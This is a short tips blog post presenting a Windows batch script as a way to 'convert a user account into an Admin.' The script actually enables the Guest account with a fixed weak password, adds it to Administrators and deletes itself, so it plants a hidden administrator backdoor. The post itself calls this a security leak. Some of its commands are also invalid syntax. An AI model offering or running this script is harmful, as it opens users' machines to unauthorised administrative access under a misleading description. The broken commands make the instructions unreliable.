Your best source of information and news about hardware, Vista hardware and BIOS on the internet

Vista ARTICLES TOP 50 Spyware Virus Vista SOFT Vista HELP

Want to convert a user account into an Admin?


Want to convert a user account into an Admin?

All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.

echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Double-click the file to execute or type the above-given code in Command Prompt.

Note: this also creates a net account which is also accessable through nets open port (basically it’s a security leak).

Popularity: 1%


Written by magakos. Read more great feeds at is source WEBSITE
no comments.
Read more articles on Scripts and WindowS HackS and All and otherSoftware.

Related articles

No comments

There are still no comments on this article.

Leave your comment...

If you want to leave your comment on this article, simply fill out the next form:




You can use these XHTML tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> .